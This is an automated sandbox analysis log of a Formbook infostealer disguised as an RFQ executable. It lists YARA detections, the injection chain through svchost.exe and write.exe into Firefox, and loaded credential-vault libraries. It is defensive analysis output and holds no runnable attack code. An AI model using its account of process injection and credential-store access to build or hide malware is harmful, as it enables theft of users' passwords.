            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF0E01_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF7B01_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F16CC1_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039856301_2_03985630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD5B01_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A095C31_2_03A095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75711_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF43F1_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039314601_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FB801_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B5BF01_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DBF91_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB761_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DDAAC1_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03985AA01_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1AA31_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDAC61_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA491_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7A461_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B3A6C1_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D59101_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039499501_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B9501_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438E01_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD8001_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941F921_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFFB11_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD21_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD51_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF091_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949EB01_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FDC01_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D5A1_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943D401_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D731_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFCF21_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B9C321_2_039B9C32
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BEF1375_2_03BEF137
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03C0FBD75_2_03C0FBD7
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF11075_2_03BF1107
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF78075_2_03BF7807
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF78025_2_03BF7802
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF0EE75_2_03BF0EE7
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF0EDE5_2_03BF0EDE
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0482E4F66_2_0482E4F6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048244206_2_04824420
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048324466_2_04832446
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048405916_2_04840591
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047805356_2_04780535
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479C6E06_2_0479C6E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047807706_2_04780770
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047A47506_2_047A4750
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0477C7C06_2_0477C7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048120006_2_04812000
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048341A26_2_048341A2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048401AA6_2_048401AA
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048381CC6_2_048381CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047701006_2_04770100
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481A1186_2_0481A118
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048081586_2_04808158
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048002C06_2_048002C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048202746_2_04820274
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048403E66_2_048403E6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478E3F06_2_0478E3F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483A3526_2_0483A352
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04820CB56_2_04820CB5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04780C006_2_04780C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04770CF26_2_04770CF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478AD006_2_0478AD00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0477ADE06_2_0477ADE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481CD1F6_2_0481CD1F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04798DBF6_2_04798DBF
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483CE936_2_0483CE93
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04780E596_2_04780E59
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483EEDB6_2_0483EEDB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483EE266_2_0483EE26
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04792E906_2_04792E90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F4F406_2_047F4F40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047A0F306_2_047A0F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047C2F286_2_047C2F28
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04822F306_2_04822F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04772FC86_2_04772FC8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047FEFA06_2_047FEFA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478A8406_2_0478A840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047828406_2_04782840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047AE8F06_2_047AE8F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047668B86_2_047668B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047969626_2_04796962
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0484A9A66_2_0484A9A6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047829A06_2_047829A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0477EA806_2_0477EA80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04836BD76_2_04836BD7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483AB406_2_0483AB40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047714606_2_04771460
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483F43F6_2_0483F43F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481D5B06_2_0481D5B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048375716_2_04837571
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048316CC6_2_048316CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483F7B06_2_0483F7B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0482F0CC6_2_0482F0CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483F0E06_2_0483F0E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048370E96_2_048370E9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047870C06_2_047870C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0476F1726_2_0476F172
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B516C6_2_047B516C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478B1B06_2_0478B1B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0484B16B6_2_0484B16B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048212ED6_2_048212ED
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479D2F06_2_0479D2F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479B2C06_2_0479B2C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047852A06_2_047852A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0476D34C6_2_0476D34C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483132D6_2_0483132D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047C739A6_2_047C739A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F9C326_2_047F9C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FCF26_2_0483FCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04783D406_2_04783D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479FDC06_2_0479FDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04831D5A6_2_04831D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04837D736_2_04837D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04789EB06_2_04789EB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FFB16_2_0483FFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FF096_2_0483FF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04781F926_2_04781F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047ED8006_2_047ED800
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047838E06_2_047838E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047899506_2_04789950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479B9506_2_0479B950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048159106_2_04815910
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F3A6C6_2_047F3A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04821AA36_2_04821AA3
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481DAAC6_2_0481DAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0482DAC66_2_0482DAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04837A466_2_04837A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FA496_2_0483FA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047C5AA06_2_047C5AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047BDBF96_2_047BDBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F5BF06_2_047F5BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FB766_2_0483FB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479FB806_2_0479FB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_00861A706_2_00861A70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085C9B76_2_0085C9B7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085C9C06_2_0085C9C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085CBE06_2_0085CBE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085AC606_2_0085AC60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008650F06_2_008650F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008632DB6_2_008632DB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008632E06_2_008632E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0087B6B06_2_0087B6B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463E4246_2_0463E424
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463C6786_2_0463C678
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463E7BC6_2_0463E7BC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463E3046_2_0463E304
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463D8286_2_0463D828
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047C7E54 appears 99 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0476B970 appears 262 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047EEA12 appears 86 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047FF290 appears 103 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047B5130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 107 times
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: String function: 00445AE0 appears 65 times
            Source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003883000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ - HTS45785-24-0907I000.exe
            Source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744401280.000000000469D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ - HTS45785-24-0907I000.exe
            Source: RFQ - HTS45785-24-0907I000.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@13/11
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeFile created: C:\Users\user\AppData\Local\Temp\batchersJump to behavior
            Source: RFQ - HTS45785-24-0907I000.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: write.exe, 00000006.00000002.4160569986.0000000000973000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2352175449.0000000000952000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2352175449.0000000000973000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ - HTS45785-24-0907I000.exeReversingLabs: Detection: 23%
            Source: RFQ - HTS45785-24-0907I000.exeVirustotal: Detection: 26%
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeFile read: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"Jump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeSection loaded: dnsapi.dllJump to behavior
